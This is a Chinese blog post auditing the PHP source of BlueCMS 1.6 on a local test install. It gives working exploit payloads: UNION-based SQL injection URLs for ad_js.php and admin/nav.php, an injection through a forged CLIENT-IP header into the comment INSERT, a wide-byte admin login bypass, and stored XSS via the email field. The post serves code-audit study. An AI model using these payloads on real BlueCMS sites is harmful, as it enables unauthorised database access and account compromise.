php代码审计篇bluecms代码审计

已于 2023-09-23 13:19:24 修改
阅读量272 收藏
点赞数
分类专栏: 代码审计 文章标签: php 开发语言 web安全 安全
于 2023-09-22 17:32:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47289634/article/details/133135149
版权

文章目录

Seay自动审计

使用seay进行自动代码审计
在这里插入图片描述

源码分析

/ad_js.php文件sql注入分析

查看执行的sql语句

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);

联系上下文可以看到仅仅判断了$ad_id这个函数是否为空
在这里插入图片描述
之后跟进getone这个函数,这里也没有进行任何过滤,故必存在sql注入
在这里插入图片描述
测试:

#查看字段数
http://127.0.0.1/bluecms/ad_js.php?ad_id=1 order by 7  #正常
http://127.0.0.1/bluecms/ad_js.php?ad_id=1 order by 8  #报错
'''
所以字段数为7
'''

#确定显示位
http://127.0.0.1/bluecms/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,7
'''
页面回显空白,查看源码看到只有7显示到界面,所以显示位在源码中,因此后面只能在源码中查看显示信息
'''

#查看数据库
view-source:127.0.0.1/bluecms_src/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,database()
'''
得到数据库:bluetest
'''

在这里插入图片描述

/include/common.fun.php注入分析

这里提示获取ip方式可以伪造,也就是client这个参数可以在数据包里伪造
在这里插入图片描述

跟进看一下,看到这里是一个函数getip,用来获取用户ip,getenv就是用来获取前台的一些东西
在这里插入图片描述
继续跟进getip这个函数,看到在评论处调用了此函数插入一条评论
在这里插入图片描述
继续跟进,看下values这些值里面有没有进行过滤,看到使用intval进行了转换,其他也都进行了防护,重点回到getip吧
在这里插入图片描述
输出这条sql语句,之后注册个用户登录,随便评论
在这里插入图片描述

输出:
INSERT INTO blue_comment (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '1', '2', '1', '2', '222', '1695303095', '127.0.0.1', '1')

可以看到本机ip也在里面,而client-ip是可以伪造的,上bp,评论,抓包,加个client-ip参数,发现可以修改
在这里插入图片描述
构造pyload

同时插入两条评论
VALUES ('', '1', '2', '1', '2', '222', '1695303095', '6.6.6.6', '1'),('', '1', '2', '1', '2', (database()), '1695303095', '6.6.6.6', '1')
client-ip:6.6.6.6', '1'),('', '1', '2', '1', '2', (database()), '1695303095', '6.6.6.6

发布评论,抓包,加入client-ip,在内容处改为sql语句,看到执行成功
在这里插入图片描述

/admin/login.php存在宽字节注入分析

所谓宽字节注入,就是单引号因为PHP中使用addslashes函数,被转义为\’,编码后就是%5c%27
加上pyload中的%df 后,就是 %df%5c%27 ,然后MySQL在使用GBK编码的时候,会认为两个字符为一个汉字, %df%5c就被解析为一个汉字,%27也就是单引号就成功逃逸了,成功实现闭合,后面就可以通过or 来执行语句了。

在这里插入图片描述
登录,抓包,admin后面加上 %df or 1=1 #登录成功
在这里插入图片描述

/admin/nav.php SQL注入分析

找到下面这段代码,可以看到navid这个参数是直接拼接在后面的

elseif($act=='edit')
 {
 	$sql = "select * from ".table('navigate')." where navid = ".$_GET['navid'];
 	$nav = $db->getone($sql);
 	$smarty->assign('nav',$nav);
 	$smarty->assign('act', $act	);
 	$smarty->display('nav_info.htm');
 }

构造pyload

#查看字段数
http://127.0.0.1/admin/nav.php?act=edit&navid=1 order by 6;  #正常
http://127.0.0.1/admin/nav.php?act=edit&navid=1 order by 7;  #报错
'''
所以字段数为6
'''

判断回显位置
在这里插入图片描述
成功
在这里插入图片描述

前台注册界面存在存储型xss

注册,抓包
在这里插入图片描述
在user.php里找到do_reg这个函数,可以看到对账号做了长度限制,但是邮箱没有任何限制
在这里插入图片描述
在邮箱后面直接跟XSS语句
在这里插入图片描述
成功弹窗
在这里插入图片描述

结束,应该还有

请添加图片描述

青衫木马牛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
bluecms源码 初级代码审计
07-31
bluecms1.6源码 适合代码审计初学者
PHP自动化代码审计工具
good good study
07-28 8554
目录 Seay Fortify RIPS Seay Seay源代码审计系统是一款绿色免费的Seay源代码审计软件。软件功能强大,提供了一键自动审计,函数查询,代码高亮编辑器,自定义审计规则,代码调试等强大功能 下载地址:链接:https://pan.baidu.com/s/1x_JIm5HYizNXkmc22GBFbg ,提取码:wfr7 使用方法 导入之后,在左边会有源码文件的预览,默认综合模式为函数,然后点击综合扫描,下面就会显示可能存在漏洞的文件与具体位置 我们发现,综合模.
PHP代码审计之基础 方法 思路 流程
st3pby的博客
12-11 997
工具 Fotify|代码审计静态扫描工具,商业化静态代码扫描工具,误报率相对较低。 seay|源代码审计工具 PHPStorm|是PHP编程语言开发的集成环境。 chrome & burp & HackerBar 插件 & xdebug插件 Xcheck |Xcheck是一个由腾讯公司CSIG质量部代码安全检查团队自研的静态应用安全测试工具。Xcheck在基于成熟的污点分析技术与对抽象语法树的精准剖解上,通过巧妙优雅的实现来达到对污点的传递和跟踪的目的,更精准地发现隐藏在代
BlueCMS代码审计
eyyer的博客
02-20 1122
BlueCMS的一次代码审计
PHP代码审计】——开启你的代码审计生涯
Demo不是emo的博客
11-14 4886
感觉最近的网络安全学习遇到了瓶颈,因为我是学习的web安全,所以自然最先学习的就是熟悉owtop10漏洞,并且我当前的专业是软件工程,所以各种计算机语言都接触过,但都学的不深,所以网安学习越深入就越感觉代码能力的重要性,所以我决定将当前的重心转到代码审计上,了解漏洞形成原因的同时,增加自己对php语言的理解,加油
PHP代码审计(一)之PHP代码审计的意义
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
07-14 641
什么是代码审计代码审计就是获取目标的源代码,这个目标可以是一个网站,也可以是一个手机app,只要我们得到了目标的源代码,我们就可以去挖掘目标系统的漏洞,代码审计是指对源代码进行检查,寻找到代码中的bug,这是一项需要多方面技能的技术,包括对编程的掌握、漏洞形成原理的理解,系统和中间件等的熟悉。代码审计是企业安全运营人员及安全从业者必备的基础能力,代码审计在很多场景中都需要用到,比如企业安全运营、渗透测试、漏洞研究等。
bluecmsv1.6代码审计
qq_42307546的博客
06-28 699
php
PHP自动化白盒审计技术与实现
Exploit的小站~
05-30 3254
0x00前言国内公开的PHP自动化审计技术资料较少,相比之下,国外已经出现了比较优秀的自动化审计实现,比如RIPS是基于token流为基础进行一系列的代码分析。传统静态分析技术如数据流分析、污染传播分析应用于PHP这种动态脚本语言分析相对较少,但是却是实现白盒自动化技术中比较关键的技术点。今天笔者主要介绍一下最近的研究与实现成果,在此抛砖引玉,希望国内更多的安全研究人员将精力投入至PHP自动化审计
浅谈PHP自动化代码审计技术
热门推荐
Exploit的小站~
04-10 1万+
 0x00 由于博客实在没什么可以更新的了,我就把目前做的事情总结一下,当做一篇博客,主要是谈一谈项目中所运用的一些技术。目前市面上有不少PHP的自动化审计工具,开源的有RIPS、Pixy,商业版本的有Fortify。RIPS现在只有第一版,由于不支持PHP面向对象分析,所以现在来看效果不是太理想。Pixy是基于数据流分析的工具,但是只支持PHP4。而Fortify是商业版本,由于这个限制
自动化代码审计工具
weixin_30756499的博客
07-14 3308
三款自动化代码审计工具 0×01 简介 工欲善其事,必先利其器。 在源代码的静态安全审计中,使用自动化工具代替人工漏洞挖掘,可以显著提高审计工作的效率。学会利用自动化代码审计工具,是每一个代码审计人员必备的能力。在学习PHP代码审计的过程中,本人搜集使用了多款自动化工具。本文将简要介绍其中三款比较实用的工具:RIPS、VCG、Fortify SCA。 RIPS是一款开...
代码审计工具_phpvulhunter PHP源码自动化审计工具
weixin_39866817的博客
11-23 554
工具介绍phpvulhunter是一款PHP源码自动化审计工具,通过这个工具,可以对一些开源CMS进行自动化的代码审计,并生成漏洞报告。工具下载安装首先从github上进行获取:git clonehttps://github.com/OneSourceCat/phpvulhunter使用 搭建好环境,访问main.php后有几个参数需要填写:Project Path:需要扫描的工程绝...
bluecms-zzcms.rar
06-09
bluecms-zzcms两款适合新手的源代码审计,代码审计入门之BlueCMS v1.6 sp1,适合练手的ZZCMS8.2漏洞
PHPCodeReviwer:PHP代码审计小案例
04-30
PHP Code Reviwer关于本项目用于记录自己学习PHP代码审计的过程,时刻鞭策自己要不断的更新!!列表标题标签简介BlueCMS v1.6 sp1 ad_js.php SQL注入int型SQL注入变量过滤不严格导致SQL注入待办事项 PHP Security ...
Bluecms内容管理系统 v1.6sp1
08-29
v1.6演示地址:http://www.bluecms.net/demo 官方网站:http://www.bluecms.net/ 官方论坛:htpp://www.bluecms.net/bbs
bluecms企业网站源代码
03-16
bluecms企业网站是一个以asp+access进行开发的企业建站cms。 bluecms介绍: 1、BlueCMS核心程序不超过200K,全部由自定义系统写成,本程序最大的特点就是不用担心升级的问题,所有版本自动升级,所有高级版本标签都兼容...
bluecms代码审计入门
qq_42307546的博客
06-27 643
php
bluecms代码审计
weixin_44255856的博客
07-06 1311
说明:最近打算入手cms,所以找了一个简单的bluecms先练练手,先立个flag至少一周一个cms. 首先使用seay源码审计工具审计全部的源码 1,发现/uploads/ad_js.php下可能存在sql注入漏洞 打开ad_js.php文件 首先判断是否存在ad_id变量如果存在就执行下面的操作 跟踪getone函数,在mysql.class.php文件中,用于封装为sql语句。 后跟...
代码审计Bluecms1.6详细汇总
王嘟嘟的博客
10-27 1285
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start SQL 文件路劲 完成 存在 uploads/ad_js.php √ √ uploads/ann.php √ ╳ uploads/index.php √ ╳ uploads/...
BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析
foolisheddy
06-20 3998
BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析 BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析 略读代码: 转换思路: 尝试宽字节注入: 理解宽字节: 总结: 参考: 略读代码: 开头包含了文件 require_once(dirname(__FILE__) . '/include/comm...
bluecms网站搭建
最新发布
04-09
BlueCMS是一种网站搭建系统,它提供了一个简单而强大的平台,用于创建和管理个人或企业网站。以下是关于BlueCMS网站搭建的一些介绍: 1. 界面友好:BlueCMS拥有直观的用户界面,使得网站搭建变得简单易用。无需编程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值